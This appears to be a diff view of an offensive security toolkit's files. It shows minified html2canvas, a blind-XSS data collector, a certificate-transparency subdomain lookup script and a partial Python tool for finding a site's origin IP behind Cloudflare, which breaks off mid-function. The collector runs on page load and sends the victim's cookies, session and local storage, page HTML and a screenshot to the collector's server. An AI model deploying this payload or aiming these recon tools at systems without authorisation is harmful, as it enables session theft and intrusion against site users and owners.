i=I(s[0])?(t.width-(r||e).width)*(parseFloat(s[0])/100):parseInt(s[0],10),o="auto"===s[1]?i/e.width*e.height:I(s[1])?(t.height-(r||e).height)*parseFloat(s[1])/100:parseInt(s[1],10),"auto"===s[0]&&(i=o/e.height*e.width),{left:i,top:o}},T.prototype.parseBackgroundRepeat=function(t){return this.cssList("backgroundRepeat",t)[0]},T.prototype.parseTextShadows=function(){var t=this.css("textShadow"),e=[];if(t&&"none"!==t)for(var n=t.match(this.TEXT_SHADOW_PROPERTY),r=0;n&&r<n.length;r++){var i=n[r].match(this.TEXT_SHADOW_VALUES);e.push({color:i[0],offsetX:i[1]?i[1].replace("px",""):0,offsetY:i[2]?i[2].replace("px",""):0,blur:i[3]?i[3].replace("px",""):0})}return e},T.prototype.parseTransform=function(){if(!this.transformData)if(this.hasTransform()){var t=this.parseBounds(),e=this.prefixedCss("transformOrigin").split(" ").map(R).map(O);e[0]+=t.left,e[1]+=t.top,this.transformData={origin:e,matrix:this.parseTransformMatrix()}}else this.transformData={origin:[0,0],matrix:[1,0,0,1,0,0]};return this.transformData},T.prototype.parseTransformMatrix=function(){if(!this.transformMatrix){var t=this.prefixedCss("transform"),e=t?k(t.match(this.MATRIX_PROPERTY)):null;this.transformMatrix=e?e:[1,0,0,1,0,0]}return this.transformMatrix},T.prototype.parseBounds=function(){return this.bounds||(this.bounds=this.hasTransform()?M(this.node):B(this.node))},T.prototype.hasTransform=function(){return"1,0,0,1,0,0"!==this.parseTransformMatrix().join(",")||this.parent&&this.parent.hasTransform()},T.prototype.getValue=function(){var t=this.node.value||"";return 
t="SELECT"===this.node.tagName?C(this.node):t,0===t.length?this.node.placeholder||"":t},T.prototype.MATRIX_PROPERTY=/(matrix)\((.+)\)/,T.prototype.TEXT_SHADOW_PROPERTY=/((rgba|rgb)\([^\)]+\)(\s-?\d+px){0,})/g,T.prototype.TEXT_SHADOW_VALUES=/(-?\d+px)|(#.+)|(rgb\(.+\))|(rgba\(.+\))/g,P.prototype.asyncRenderer=function(t,e,n){n=n||Date.now(),this.paint(t[this.renderIndex++]),t.length===this.renderIndex?e():n+20>Date.now()?this.asyncRenderer(t,e,n):setTimeout(ie(function(){this.asyncRenderer(t,e)},this),0)},P.prototype.createPseudoHideStyles=function(t){var e=t.createElement("style");e.innerHTML="."+this.pseudoHideClass+':before { content: "" !important; display: none !important; }.'+this.pseudoHideClass+':after { content: "" !important; display: none !important; }',t.body.appendChild(e)},P.prototype.getPseudoElements=function(t){var e=[[t]];if(t.node.nodeType===Node.ELEMENT_NODE){var n=this.getPseudoElement(t,":before"),r=this.getPseudoElement(t,":after");n&&(t.node.insertBefore(n[0].node,t.node.firstChild),e.push(n)),r&&(t.node.appendChild(r[0].node),e.push(r)),(n||r)&&(t.node.className+=" "+this.pseudoHideClass)}return ce(e)},P.prototype.getPseudoElement=function(t,n){var r=t.computedStyle(n);if(!r||!r.content||"none"===r.content||"-moz-alt-content"===r.content||"none"===r.display)return null;for(var i=he(r.content),o="url"===i.substr(0,3),s=e.createElement(o?"img":"html2canvaspseudoelement"),a=new T(s,t),c=r.length-1;c>=0;c--){var h=A(r.item(c));s.style[h]=r[h]}if(s.className=this.pseudoHideClass,o)return s.src=S(i)[0].args[0],[a];var u=e.createTextNode(i);return s.appendChild(u),[a,new ye(u,a)]},P.prototype.getChildren=function(t){return ce([].filter.call(t.node.childNodes,Q).map(function(e){var n=[e.nodeType===Node.TEXT_NODE?new ye(e,t):new T(e,t)].filter(ae);return e.nodeType===Node.ELEMENT_NODE&&n.length&&"TEXTAREA"!==e.tagName?n[0].isElementVisible()?n.concat(this.getChildren(n[0])):[]:n},this))},P.prototype.newStackingContext=function(t,e){var n=new 
le(e,t.cssFloat("opacity"),t.node,t.parent);n.visible=t.visible;var r=e?n.getParentStack(this):n.parent.stack;r.contexts.push(n),t.stack=n},P.prototype.createStackingContexts=function(){this.nodes.forEach(function(t){te(t)&&(this.isRootElement(t)||re(t)||q(t)||this.isBodyWithTransparentRoot(t)||t.hasTransform())?this.newStackingContext(t,!0):te(t)&&($(t)&&V(t)||K(t)||J(t))?this.newStackingContext(t,!1):t.assignStack(t.parent.stack)},this)},P.prototype.isBodyWithTransparentRoot=function(t){return"BODY"===t.node.nodeName&&this.renderer.isTransparent(t.parent.css("backgroundColor"))},P.prototype.isRootElement=function(t){return null===t.parent},P.prototype.sortStackingContexts=function(t){t.contexts.sort(ne),t.contexts.forEach(this.sortStackingContexts,this)},P.prototype.parseTextBounds=function(t){return function(e,n,r){if("none"!==t.parent.css("textDecoration").substr(0,4)||0!==e.trim().length){if(this.support.rangeBounds&&!t.parent.hasTransform()){var i=r.slice(0,n).join("").length;return this.getRangeBounds(t.node,i,e.length)}if(t.node&&"string"==typeof t.node.data){var o=t.node.splitText(e.length),s=this.getWrapperBounds(t.node,t.parent.hasTransform());return t.node=o,s}}else(!this.support.rangeBounds||t.parent.hasTransform())&&(t.node=t.node.splitText(e.length));return{}}},P.prototype.getWrapperBounds=function(t,e){var n=t.ownerDocument.createElement("html2canvaswrapper"),r=t.parentNode,i=t.cloneNode(!0);n.appendChild(t.cloneNode(!0)),r.replaceChild(n,t);var o=e?M(n):B(n);return r.replaceChild(i,n),o},P.prototype.getRangeBounds=function(t,e,n){var r=this.range||(this.range=t.ownerDocument.createRange());return r.setStart(t,e),r.setEnd(t,e+n),r.getBoundingClientRect()},P.prototype.parse=function(t){var 
e=t.contexts.filter(H),n=t.children.filter(te),r=n.filter(Z(J)),i=r.filter(Z($)).filter(Z(z)),o=n.filter(Z($)).filter(J),s=r.filter(Z($)).filter(z),a=t.contexts.concat(r.filter($)).filter(V),c=t.children.filter(ee).filter(X),h=t.contexts.filter(j);e.concat(i).concat(o).concat(s).concat(a).concat(c).concat(h).forEach(function(t){this.renderQueue.push(t),Y(t)&&(this.parse(t),this.renderQueue.push(new N))},this)},P.prototype.paint=function(t){try{t instanceof N?this.renderer.ctx.restore():ee(t)?this.paintText(t):this.paintNode(t)}catch(e){E(e)}},P.prototype.paintNode=function(t){Y(t)&&(this.renderer.setOpacity(t.opacity),this.renderer.ctx.save(),t.hasTransform()&&this.renderer.setTransform(t.parseTransform()));var e=t.parseBounds(),n=this.parseBorders(t);switch(this.renderer.clip(n.clip,function(){this.renderer.renderBackground(t,e,n.borders.map(se))},this),this.renderer.renderBorders(n.borders),t.node.nodeName){case"svg":var r=this.images.get(t.node);r?this.renderer.renderImage(t,e,n,r):E("Error loading <svg>",t.node);break;case"IMG":var i=this.images.get(t.node.src);i?this.renderer.renderImage(t,e,n,i):E("Error loading <img>",t.node.src);break;case"SELECT":case"INPUT":case"TEXTAREA":this.paintFormValue(t)}},P.prototype.paintFormValue=function(t){if(t.getValue().length>0){var e=t.node.ownerDocument,n=e.createElement("html2canvaswrapper"),r=["lineHeight","textAlign","fontFamily","fontWeight","fontSize","color","paddingLeft","paddingTop","paddingRight","paddingBottom","width","height","borderLeftStyle","borderTopStyle","borderLeftWidth","borderTopWidth","boxSizing","whiteSpace","wordWrap"];
    189  -r.forEach(function(e){try{n.style[e]=t.css(e)}catch(r){E("html2canvas: Parse: Exception caught in renderFormValue: "+r.message)}});var i=t.parseBounds();n.style.position="absolute",n.style.left=i.left+"px",n.style.top=i.top+"px",n.textContent=t.getValue(),e.body.appendChild(n),this.paintText(new ye(n.firstChild,t)),e.body.removeChild(n)}},P.prototype.paintText=function(t){t.applyTextTransform();var e=t.node.data.split(!this.options.letterRendering||G(t)?/(\b| )/:""),n=t.parent.fontWeight(),r=t.parent.css("fontSize"),i=t.parent.css("fontFamily"),o=t.parent.parseTextShadows();this.renderer.font(t.parent.css("color"),t.parent.css("fontStyle"),t.parent.css("fontVariant"),n,r,i),o.length?this.renderer.fontShadow(o[0].color,o[0].offsetX,o[0].offsetY,o[0].blur):this.renderer.clearShadow(),e.map(this.parseTextBounds(t),this).forEach(function(n,o){n&&(this.renderer.text(e[o],n.left,n.bottom),this.renderTextDecoration(t.parent,n,this.fontMetrics.getMetrics(i,r)))},this)},P.prototype.renderTextDecoration=function(t,e,n){switch(t.css("textDecoration").split(" ")[0]){case"underline":this.renderer.rectangle(e.left,Math.round(e.top+n.baseline+n.lineWidth),e.width,1,t.css("color"));break;case"overline":this.renderer.rectangle(e.left,Math.round(e.top),e.width,1,t.css("color"));break;case"line-through":this.renderer.rectangle(e.left,Math.ceil(e.top+n.middle+n.lineWidth),e.width,1,t.css("color"))}},P.prototype.parseBorders=function(t){var e=t.bounds,n=U(t),r=["Top","Right","Bottom","Left"].map(function(e){return{width:t.cssInt("border"+e+"Width"),color:t.css("border"+e+"Color"),args:null}}),i=D(e,n,r);return{clip:this.parseBackgroundClip(t,i,r,n,e),borders:r.map(function(t,o){if(t.width>0){var s=e.left,a=e.top,c=e.width,h=e.height-r[2].width;switch(o){case 0:h=r[0].width,t.args=F({c1:[s,a],c2:[s+c,a],c3:[s+c-r[1].width,a+h],c4:[s+r[3].width,a+h]},n[0],n[1],i.topLeftOuter,i.topLeftInner,i.topRightOuter,i.topRightInner);break;case 
1:s=e.left+e.width-r[1].width,c=r[1].width,t.args=F({c1:[s+c,a],c2:[s+c,a+h+r[2].width],c3:[s,a+h],c4:[s,a+r[0].width]},n[1],n[2],i.topRightOuter,i.topRightInner,i.bottomRightOuter,i.bottomRightInner);break;case 2:a=a+e.height-r[2].width,h=r[2].width,t.args=F({c1:[s+c,a+h],c2:[s,a+h],c3:[s+r[3].width,a],c4:[s+c-r[3].width,a]},n[2],n[3],i.bottomRightOuter,i.bottomRightInner,i.bottomLeftOuter,i.bottomLeftInner);break;case 3:c=r[3].width,t.args=F({c1:[s,a+h+r[2].width],c2:[s,a],c3:[s+c,a+r[0].width],c4:[s+c,a+h]},n[3],n[0],i.bottomLeftOuter,i.bottomLeftInner,i.topLeftOuter,i.topLeftInner)}}return t})}},P.prototype.parseBackgroundClip=function(t,e,n,r,i){var o=t.css("backgroundClip"),s=[];switch(o){case"content-box":case"padding-box":W(s,r[0],r[1],e.topLeftInner,e.topRightInner,i.left+n[3].width,i.top+n[0].width),W(s,r[1],r[2],e.topRightInner,e.bottomRightInner,i.left+i.width-n[1].width,i.top+n[0].width),W(s,r[2],r[3],e.bottomRightInner,e.bottomLeftInner,i.left+i.width-n[1].width,i.top+i.height-n[2].width),W(s,r[3],r[0],e.bottomLeftInner,e.topLeftInner,i.left+n[3].width,i.top+i.height-n[2].width);break;default:W(s,r[0],r[1],e.topLeftOuter,e.topRightOuter,i.left,i.top),W(s,r[1],r[2],e.topRightOuter,e.bottomRightOuter,i.left+i.width,i.top),W(s,r[2],r[3],e.bottomRightOuter,e.bottomLeftOuter,i.left+i.width,i.top+i.height),W(s,r[3],r[0],e.bottomLeftOuter,e.topLeftOuter,i.left,i.top+i.height)}return s},P.prototype.pseudoHideClass="___html2canvas___pseudoelement";var Te=0;pe.prototype.renderImage=function(t,e,n,r){var 
i=t.cssInt("paddingLeft"),o=t.cssInt("paddingTop"),s=t.cssInt("paddingRight"),a=t.cssInt("paddingBottom"),c=n.borders,h=e.width-(c[1].width+c[3].width+i+s),u=e.height-(c[0].width+c[2].width+o+a);this.drawImage(r,0,0,r.image.width||h,r.image.height||u,e.left+i+c[3].width,e.top+o+c[0].width,h,u)},pe.prototype.renderBackground=function(t,e,n){e.height>0&&e.width>0&&(this.renderBackgroundColor(t,e),this.renderBackgroundImage(t,e,n))},pe.prototype.renderBackgroundColor=function(t,e){var n=t.css("backgroundColor");this.isTransparent(n)||this.rectangle(e.left,e.top,e.width,e.height,t.css("backgroundColor"))},pe.prototype.renderBorders=function(t){t.forEach(this.renderBorder,this)},pe.prototype.renderBorder=function(t){this.isTransparent(t.color)||null===t.args||this.drawShape(t.args,t.color)},pe.prototype.renderBackgroundImage=function(t,e,n){var r=t.parseBackgroundImages();r.reverse().forEach(function(r,i,o){switch(r.method){case"url":var s=this.images.get(r.args[0]);s?this.renderBackgroundRepeating(t,e,s,o.length-(i+1),n):E("Error loading background-image",r.args[0]);break;case"linear-gradient":case"gradient":var a=this.images.get(r.value);a?this.renderBackgroundGradient(a,e,n):E("Error loading background-image",r.args[0]);break;case"none":break;default:E("Unknown background-image type",r.args[0])}},this)},pe.prototype.renderBackgroundRepeating=function(t,e,n,r,i){var o=t.parseBackgroundSize(e,n.image,r),s=t.parseBackgroundPosition(e,n.image,r,o),a=t.parseBackgroundRepeat(r);switch(a){case"repeat-x":case"repeat no-repeat":this.backgroundRepeatShape(n,s,o,e,e.left+i[3],e.top+s.top+i[0],99999,n.image.height,i);break;case"repeat-y":case"no-repeat 
repeat":this.backgroundRepeatShape(n,s,o,e,e.left+s.left+i[3],e.top+i[0],n.image.width,99999,i);break;case"no-repeat":this.backgroundRepeatShape(n,s,o,e,e.left+s.left+i[3],e.top+s.top+i[0],n.image.width,n.image.height,i);break;default:this.renderBackgroundRepeat(n,s,o,{top:e.top,left:e.left},i[3],i[0])}},pe.prototype.isTransparent=function(t){return!t||"transparent"===t||"rgba(0, 0, 0, 0)"===t},le.prototype=Object.create(T.prototype),le.prototype.getParentStack=function(t){var e=this.parent?this.parent.stack:null;return e?e.ownStacking?e:e.getParentStack(t):t.stack},de.prototype.testRangeBounds=function(t){var e,n,r,i,o=!1;return t.createRange&&(e=t.createRange(),e.getBoundingClientRect&&(n=t.createElement("boundtest"),n.style.height="123px",n.style.display="block",t.body.appendChild(n),e.selectNode(n),r=e.getBoundingClientRect(),i=r.height,123===i&&(o=!0),t.body.removeChild(n))),o},de.prototype.testCORS=function(){return"undefined"!=typeof(new Image).crossOrigin},de.prototype.testSVG=function(){var t=new Image,n=e.createElement("canvas"),r=n.getContext("2d");t.src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'></svg>";try{r.drawImage(t,0,0),n.toDataURL()}catch(i){return!1}return!0},fe.prototype.hasFabric=function(){return html2canvas.fabric?Promise.resolve():Promise.reject(new Error("html2canvas.svg.js is not loaded, cannot render svg"))},fe.prototype.inlineFormatting=function(t){return/^data:image\/svg\+xml;base64,/.test(t)?this.decode64(this.removeContentType(t)):this.removeContentType(t)},fe.prototype.removeContentType=function(t){return t.replace(/^data:image\/svg\+xml(;base64)?,/,"")},fe.prototype.isInline=function(t){return/^data:image\/svg\+xml/i.test(t)},fe.prototype.createCanvas=function(t){var e=this;return function(n,r){var i=new 
html2canvas.fabric.StaticCanvas("c");e.image=i.lowerCanvasEl,i.setWidth(r.width).setHeight(r.height).add(html2canvas.fabric.util.groupSVGElements(n,r)).renderAll(),t(i.lowerCanvasEl)}},fe.prototype.decode64=function(e){return"function"==typeof t.atob?t.atob(e):ge(e)},me.prototype=Object.create(fe.prototype),ye.prototype=Object.create(T.prototype),ye.prototype.applyTextTransform=function(){this.node.data=this.transform(this.parent.css("textTransform"))},ye.prototype.transform=function(t){var e=this.node.data;switch(t){case"lowercase":return e.toLowerCase();case"capitalize":return e.replace(/(^|\s|:|-|\(|\))([a-z])/g,ve);case"uppercase":return e.toUpperCase();default:return e}},we.prototype=Object.create(f.prototype),xe.prototype=Object.create(pe.prototype),xe.prototype.setFillStyle=function(t){return this.ctx.fillStyle=t,this.ctx},xe.prototype.rectangle=function(t,e,n,r,i){this.setFillStyle(i).fillRect(t,e,n,r)},xe.prototype.drawShape=function(t,e){this.shape(t),this.setFillStyle(e).fill()},xe.prototype.taints=function(t){if(null===t.tainted){this.taintCtx.drawImage(t.image,0,0);try{this.taintCtx.getImageData(0,0,1,1),t.tainted=!1}catch(n){this.taintCtx=e.createElement("canvas").getContext("2d"),t.tainted=!0}}return t.tainted},xe.prototype.drawImage=function(t,e,n,r,i,o,s,a,c){(!this.taints(t)||this.options.allowTaint)&&this.ctx.drawImage(t.image,e,n,r,i,o,s,a,c)},xe.prototype.clip=function(t,e,n){this.ctx.save(),this.shape(t).clip(),e.call(n),this.ctx.restore()},xe.prototype.shape=function(t){return this.ctx.beginPath(),t.forEach(function(t,e){this.ctx[0===e?"moveTo":t[0]+"To"].apply(this.ctx,t.slice(1))},this),this.ctx.closePath(),this.ctx},xe.prototype.font=function(t,e,n,r,i,o){this.setFillStyle(t).font=[e,n,r,i,o].join(" 
")},xe.prototype.fontShadow=function(t,e,n,r){this.setVariable("shadowColor",t).setVariable("shadowOffsetY",e).setVariable("shadowOffsetX",n).setVariable("shadowBlur",r)},xe.prototype.clearShadow=function(){this.setVariable("shadowColor","rgba(0,0,0,0)")},xe.prototype.setOpacity=function(t){this.ctx.globalAlpha=t},xe.prototype.setTransform=function(t){this.ctx.translate(t.origin[0],t.origin[1]),this.ctx.transform.apply(this.ctx,t.matrix),this.ctx.translate(-t.origin[0],-t.origin[1])},xe.prototype.setVariable=function(t,e){return this.variables[t]!==e&&(this.variables[t]=this.ctx[t]=e),this},xe.prototype.text=function(t,e,n){this.ctx.fillText(t,e,n)},xe.prototype.backgroundRepeatShape=function(t,e,n,r,i,o,s,a,c){var h=[["line",Math.round(i),Math.round(o)],["line",Math.round(i+s),Math.round(o)],["line",Math.round(i+s),Math.round(a+o)],["line",Math.round(i),Math.round(a+o)]];this.clip(h,function(){this.renderBackgroundRepeat(t,e,n,r,c[3],c[0])},this)},xe.prototype.renderBackgroundRepeat=function(t,e,n,r,i,o){var s=Math.round(r.left+e.left+i),a=Math.round(r.top+e.top+o);this.setFillStyle(this.ctx.createPattern(this.resizeImage(t,n),"repeat")),this.ctx.translate(s,a),this.ctx.fill(),this.ctx.translate(-s,-a)},xe.prototype.renderBackgroundGradient=function(t,e){if(t instanceof x){var n=this.ctx.createLinearGradient(e.left+e.width*t.x0,e.top+e.height*t.y0,e.left+e.width*t.x1,e.top+e.height*t.y1);t.colorStops.forEach(function(t){n.addColorStop(t.stop,t.color)}),this.rectangle(e.left,e.top,e.width,e.height,n)}},xe.prototype.resizeImage=function(t,n){var r=t.image;if(r.width===n.width&&r.height===n.height)return r;var i,o=e.createElement("canvas");return o.width=n.width,o.height=n.height,i=o.getContext("2d"),i.drawImage(r,0,0,r.width,r.height,0,0,n.width,n.height),o}}(window,document);
    190  - 
    191  -function collectDatas()
    192  -{
    193  - window.setTimeout( doCollectDatas, 2000 );
    194  -}
    195  - 
    196  -function doCollectDatas()
    197  -{
    198  - var callback = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';
    199  - 
    200  - var t_datas = new Object();
    201  - t_datas['origin'] = document.location.origin;
    202  - t_datas['user_agent'] = navigator.userAgent;
    203  - t_datas['target_url'] = document.URL;
    204  - t_datas['referrer_url'] = document.referrer;
    205  - t_datas['cookies'] = document.cookie;
    206  - t_datas['session_storage'] = JSON.stringify(sessionStorage);
    207  - t_datas['local_storage'] = JSON.stringify(localStorage);
    208  - t_datas['document_html'] = document.documentElement.outerHTML;
    209  - 
    210  - try {
    211  - html2canvas(document.body).then(function(canvas) {
    212  - t_datas['screenshot'] = canvas.toDataURL();
    213  - sendDatas( callback, t_datas );
    214  - }, function() {
    215  - t_datas['screenshot'] = '';
    216  - sendDatas( callback, t_datas );
    217  - });
    218  - } catch( e ) {
    219  - t_datas['screenshot'] = '';
    220  - sendDatas( callback, t_datas );
    221  - }
    222  -}
    223  - 
    224  -function sendDatas( callback, t_datas )
    225  -{
    226  - var xhr = new XMLHttpRequest();
    227  - xhr.open( 'POST', callback, true );
    228  - xhr.setRequestHeader( 'Content-type', 'application/x-www-form-urlencoded' );
    229  - xhr.send( 'datas=' + encodeURIComponent(JSON.stringify(t_datas)) );
    230  -}
    231  - 
    232  -if( document.readyState == 'complete' ) {
    233  - collectDatas();
    234  -} else {
    235  - if( window.addEventListener ) {
    236  - window.addEventListener( 'load', collectDatas, false );
    237  - } else if( window.attachEvent ) {
    238  - window.attachEvent( 'onload', collectDatas );
    239  - }
    240  -}
    241  - 
  • ■ ■ ■ ■ ■ ■
    certspotter.sh
    1  -#!/bin/bash
    2  - 
    3  -curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq -r '.[].dns_names[]' | sort -fu
    4  - 
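The pipeline above flattens each certificate's `dns_names` array and dedupes case-insensitively. The same extraction can be sketched in Python against a small illustrative payload (the sample JSON below is made up, not real certspotter output):

```python
import json

# Illustrative sample shaped like the certspotter v0 response: a list of
# certs, each carrying a dns_names array (possibly with duplicates).
sample = json.loads(
    '[{"dns_names": ["example.com", "www.example.com"]},'
    ' {"dns_names": ["www.example.com", "mail.example.com"]}]'
)

# Flatten, dedupe, and sort case-insensitively -- the jq + sort -fu equivalent.
names = sorted({n for cert in sample for n in cert["dns_names"]}, key=str.lower)
print("\n".join(names))
```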
  • ■ ■ ■ ■ ■ ■
    cloudflare-origin-ip.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import os
    7  -import sys
    8  -import json
    9  -import requests
    10  -import tldextract
    11  -import socket
    12  -import argparse
    13  -import threading
    14  -import time
    15  -import textwrap
    16  -from functools import partial
    17  -# from urlparse import urlparse
    18  -from urllib import parse
    19  -from termcolor import colored
    20  -from netaddr import *
    21  -from multiprocessing.dummy import Pool
    22  - 
    23  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    24  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    25  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    26  - 
    27  - 
    28  -def banner():
    29  - print("""
    30  - _ _ __ _ _ _ _
    31  - ___| | ___ _ _ __| |/ _| | __ _ _ __ ___ ___ _ __(_) __ _(_)_ __ (_)_ __ _ __ _ _
    32  - / __| |/ _ \| | | |/ _` | |_| |/ _` | '__/ _ \ / _ \| '__| |/ _` | | '_ \ | | '_ \ | '_ \| | | |
    33  - | (__| | (_) | |_| | (_| | _| | (_| | | | __/ | (_) | | | | (_| | | | | | | | |_) | _ | |_) | |_| |
    34  - \___|_|\___/ \__,_|\__,_|_| |_|\__,_|_| \___| \___/|_| |_|\__, |_|_| |_| |_| .__/ (_) | .__/ \__, |
    35  - |___/ |_| |_| |___/
    36  - 
    37  - by @gwendallecoguic
    38  - 
    39  -""")
    40  - pass
    41  - 
    42  -banner()
    43  - 
    44  - 
    45  -TEST_BYPASS = 1
    46  -GOOD_CANDIDATE_SCORE = 80
    47  -COMPARE_FIRST_CHARS = 1000
    48  -REQUEST_TIMEOUT = 3
    49  -MAX_THREADS = 10
    50  - 
    51  -r_cloudflare = [
    52  - '103.21.244.0/22',
    53  - '103.22.200.0/22',
    54  - '103.31.4.0/22',
    55  - '104.16.0.0/12',
    56  - '108.162.192.0/18',
    57  - '131.0.72.0/22',
    58  - '141.101.64.0/18',
    59  - '162.158.0.0/15',
    60  - '172.64.0.0/13',
    61  - '173.245.48.0/20',
    62  - '188.114.96.0/20',
    63  - '190.93.240.0/20',
    64  - '197.234.240.0/22',
    65  - '198.41.128.0/17'
    66  -]
    67  -r_cloudflare2 = [
    68  - [1729491968,1729492991],
    69  - [1729546240,1729547263],
    70  - [1730085888,1730086911],
    71  - [1745879040,1746927615],
    72  - [1822605312,1822621695],
    73  - [2197833728,2197834751],
    74  - [2372222976,2372239359],
    75  - [2728263680,2728394751],
    76  - [2889875456,2890399743],
    77  - [2918526976,2918531071],
    78  - [3161612288,3161616383],
    79  - [3193827328,3193831423],
    80  - [3320508416,3320509439],
    81  - [3324608512,3324641279]
    82  -]
    83  - 
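The `r_cloudflare2` entries are the same blocks as `r_cloudflare`, pre-converted to inclusive `[first, last]` integer bounds so membership checks avoid building netaddr objects. A minimal sketch of that conversion using only the stdlib `ipaddress` module:

```python
import ipaddress

def cidr_to_int_range(cidr):
    # First and last address of the block as integers, inclusive,
    # matching the precomputed bounds in r_cloudflare2.
    net = ipaddress.ip_network(cidr)
    return [int(net.network_address), int(net.broadcast_address)]

# The first and last r_cloudflare entries map to the corresponding
# r_cloudflare2 bounds, e.g.:
# cidr_to_int_range('103.21.244.0/22') -> [1729491968, 1729492991]
```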
    84  -t_exclude_headers = [
    85  - 'Set-Cookie', 'Date', 'Last-Modified', 'Expires', 'Age', 'CF-RAY'
    86  -]
    87  - 
    88  -parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, epilog=textwrap.dedent('''Examples:
    89  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx
    90  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s censys,crtsh (default)
    91  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s /home/local/ips.txt
    92  -cloudflare-origin-ip.py -u https://xxx.xxxxxxxxxxxx.xxx -s censys,crtsh,/home/local/ips.txt,/home/local/subdomains.txt
    93  - 
    94  -Note that this is an automated tool; manual verification is still required.
    95  -''') )
    96  -parser.add_argument( "-u","--url",help="url to test" )
    97  -parser.add_argument( "-s","--source",help="data sources separated by commas, can be: censys, crtsh, or a local file" )
    98  -args = parser.parse_args()
    100  - 
    101  -if args.url:
    102  - url = args.url
    103  -else:
    104  - parser.error( 'url is missing <https://www.example.com>' )
    105  - 
    106  -if args.source:
    107  - t_sources = args.source.split( ',' )
    108  -else:
    109  - t_sources = [ 'censys', 'crtsh' ]
    110  - 
    111  -if 'censys' in t_sources:
    112  - CENSYS_API_URL = 'https://search.censys.io/api'
    113  - try:
    114  - CENSYS_UID = os.environ['CENSYS_UID']
    115  - CENSYS_SECRET = os.environ['CENSYS_SECRET']
    116  - except Exception as e:
    117  - print( "Error: %s not defined" % e )
    118  - print( "To fix this:" )
    119  - print( "export CENSYS_UID=xxxxxxxxxxxxxxxxxxxxxxxxxx" )
    120  - print( "export CENSYS_SECRET=xxxxxxxxxxxxxxxxxxxxxxx" )
    121  - exit()
    122  - 
    123  -# https://stackoverflow.com/questions/5619685/conversion-from-ip-string-to-integer-and-backward-in-python
    124  -def IP2Int(ip):
    125  - o = list( map(int, ip.split('.')) )
    126  - res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]
    127  - return res
    128  - 
    129  -def Int2IP(ipnum):
    130  - o1 = int(ipnum / 16777216) % 256
    131  - o2 = int(ipnum / 65536) % 256
    132  - o3 = int(ipnum / 256) % 256
    133  - o4 = int(ipnum) % 256
    134  - return '%(o1)s.%(o2)s.%(o3)s.%(o4)s' % locals()
    135  - 
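A quick round-trip check of the two converters above; they are copied here (with floor division, which behaves the same for these values) so the sketch is self-contained:

```python
def IP2Int(ip):
    # Dotted quad to 32-bit integer, highest octet first.
    o = list(map(int, ip.split('.')))
    return (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]

def Int2IP(ipnum):
    # Inverse: pull each octet back out with floor division.
    return '%d.%d.%d.%d' % (
        (ipnum // 16777216) % 256,
        (ipnum // 65536) % 256,
        (ipnum // 256) % 256,
        ipnum % 256,
    )
```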
    136  - 
    137  -# https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python
    138  -def levenshtein(s, t):
    139  - ''' From Wikipedia article; Iterative with two matrix rows. '''
    140  - if s == t: return 0
    141  - elif len(s) == 0: return len(t)
    142  - elif len(t) == 0: return len(s)
    143  - v0 = [None] * (len(t) + 1)
    144  - v1 = [None] * (len(t) + 1)
    145  - for i in range(len(v0)):
    146  - v0[i] = i
    147  - for i in range(len(s)):
    148  - v1[0] = i + 1
    149  - for j in range(len(t)):
    150  - cost = 0 if s[i] == t[j] else 1
    151  - v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
    152  - for j in range(len(v0)):
    153  - v0[j] = v1[j]
    154  - 
    155  - return v1[len(t)]
    156  - 
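The two-row variant above keeps only O(len(t)) memory; it can be sanity-checked against the textbook pairs (self-contained copy below):

```python
def levenshtein(s, t):
    # Iterative two-matrix-row Levenshtein, as in the script above.
    if s == t:
        return 0
    if len(s) == 0:
        return len(t)
    if len(t) == 0:
        return len(s)
    v0 = list(range(len(t) + 1))
    v1 = [0] * (len(t) + 1)
    for i in range(len(s)):
        v1[0] = i + 1
        for j in range(len(t)):
            cost = 0 if s[i] == t[j] else 1
            v1[j + 1] = min(v1[j] + 1, v0[j + 1] + 1, v0[j] + cost)
        v0 = v1[:]
    return v1[len(t)]
```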
    157  - 
    158  -def grabSubs( domain ):
    159  - print( "[+] Grabbing subdomains from crt.sh: %s" % domain )
    160  - url = 'https://crt.sh/?q=%25.' + domain + '&output=json'
    161  - try:
    162  - ex = 0
    163  - r = requests.get( url )
    164  - except Exception as e:
    165  - ex = 1
    166  - print( colored("[-] error occurred: %s" % e, 'red') )
    167  - if ex == 0 and r.status_code == 200:
    168  - n = 0
    169  - j = r.json()
    170  - for item in j:
    172  - sub = item['name_value'].replace( '*.', '' )
    173  - if sub != domain and not sub in t_subs:
    174  - t_subs.append( sub )
    175  - try:
    176  - ex = 0
    177  - data = socket.gethostbyname( sub )
    178  - if not data in t_ips:
    179  - n = n + 1
    180  - t_ips.append( data )
    181  - except Exception as e:
    182  - ex = 1
    183  - print( colored("[+] %d subdomains found, %d ips added" % (len(t_subs),n), 'green') )
    184  - 
    185  - 
    186  -def grabIPfromCensys( domain ):
    187  - print( "[+] Grabbing ips from Censys: %s" % domain )
    188  - query = {"query":domain}
    189  - headers = {"Content-Type":"application/json"}
    190  - try:
    191  - ex = 0
    192  - r = requests.get( CENSYS_API_URL+'/v2/hosts/search?q='+domain, headers=headers, auth=(CENSYS_UID,CENSYS_SECRET) )
    193  - except Exception as e:
    194  - ex = 1
    195  - print( colored("[-] error occurred: %s" % e, 'red') )
    196  - if ex == 0 and r.status_code == 200:
    197  - j = r.json()
    198  - if int(j['code']) == 200 and j['status'] == 'OK' and type(j['result']) is dict and len(j['result'])>0 and type(j['result']['hits']) is list and len(j['result']['hits'])>0:
